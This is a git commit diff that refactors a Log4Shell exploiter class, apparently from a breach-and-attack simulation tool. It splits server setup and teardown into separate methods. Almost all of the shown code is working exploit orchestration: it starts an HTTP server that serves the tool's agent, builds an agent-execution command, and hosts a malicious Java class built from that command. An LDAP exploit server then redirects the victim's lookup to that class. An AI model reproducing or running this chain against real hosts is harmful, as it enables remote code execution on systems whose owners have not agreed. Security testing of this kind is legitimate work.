Agent: refactor log4shell

Refactor extracts server setup and shutdown functionality into separate methods
This commit is contained in:
vakarisz 2022-01-06 16:35:38 +02:00
parent 79d92afcd4
commit a38536b59b
1 changed files with 49 additions and 21 deletions

View File

@ -42,47 +42,75 @@ class Log4ShellExploiter(WebRCE):
self.ldap_port = get_free_tcp_port() self.ldap_port = get_free_tcp_port()
self.class_http_server_port = get_free_tcp_port() self.class_http_server_port = get_free_tcp_port()
self.ldap_server_thread = None
self.ldap_server = None
self.agent_http_server_thread = None
self.java_class_http_server_thread = None
def _exploit_host(self): def _exploit_host(self):
self.start_servers()
try:
self.exploit(None, None)
finally:
self.stop_servers()
# If java class was downloaded it means that victim is vulnerable
return Log4ShellExploiter.HTTPHandler.class_downloaded
def start_servers(self):
# Start http server, to serve agent to victims
paths = self.get_monkey_paths() paths = self.get_monkey_paths()
agent_http_path = self.start_agent_http_server(paths)
# Build agent execution command
command = self.build_command(paths["dest_path"], agent_http_path)
# Start http server to serve malicious java class to victim
class_server_ip = self.start_class_http_server(command)
# Start ldap server to redirect ldap query to java class server
self.start_ldap_server(class_server_ip)
def start_agent_http_server(self, agent_paths: dict) -> str:
# Create server for http download and wait for it's startup. # Create server for http download and wait for it's startup.
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"]) http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, agent_paths["src_path"]
)
self.agent_http_server_thread = http_thread
if not http_path: if not http_path:
logger.debug("Exploiter failed, http transfer creation failed.") logger.debug("Exploiter failed, couldn't start an http server to serve agent.")
return False raise Exception("Http server creation failed")
logger.info("Started http server on %s", http_path) logger.info("Started http server on %s", http_path)
return http_path
command = self.build_command(paths["dest_path"], http_path) def start_class_http_server(self, command: str) -> str:
java_class = self.build_java_class(command) java_class = self.build_java_class(command)
class_http_server_ip = get_interface_to_target(self.host.ip_addr) class_http_server_ip = get_interface_to_target(self.host.ip_addr)
java_class_http_thread = self.get_java_class_server_thread(class_http_server_ip, java_class) java_class_http_thread = self.get_java_class_server_thread(class_http_server_ip, java_class)
java_class_http_thread.start() self.java_class_http_server_thread = java_class_http_thread
self.java_class_http_server_thread.start()
return class_http_server_ip
ldap = LDAPExploitServer( def start_ldap_server(self, class_http_server_ip: str):
self.ldap_server = LDAPExploitServer(
ldap_server_port=self.ldap_port, ldap_server_port=self.ldap_port,
http_server_ip=class_http_server_ip, http_server_ip=class_http_server_ip,
http_server_port=self.class_http_server_port, http_server_port=self.class_http_server_port,
storage_dir=get_monkey_dir_path(), storage_dir=get_monkey_dir_path(),
) )
ldap_thread = ldap.get_run_thread() ldap_thread = self.ldap_server.get_run_thread()
ldap_thread.start() self.ldap_server_thread = ldap_thread
self.ldap_server_thread.start()
try: def stop_servers(self):
self.exploit(None, None) self.agent_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
finally: self.agent_http_server_thread.stop()
http_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
http_thread.stop()
java_class_http_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT) self.java_class_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
Log4ShellExploiter.HTTPHandler.stop = True Log4ShellExploiter.HTTPHandler.stop = True
ldap_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT) self.ldap_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
ldap.stop() self.ldap_server.stop()
# If java class was downloaded it means that victim is vulnerable
return Log4ShellExploiter.HTTPHandler.class_downloaded
def build_ldap_payload(self): def build_ldap_payload(self):
interface_ip = get_interface_to_target(self.host.ip_addr) interface_ip = get_interface_to_target(self.host.ip_addr)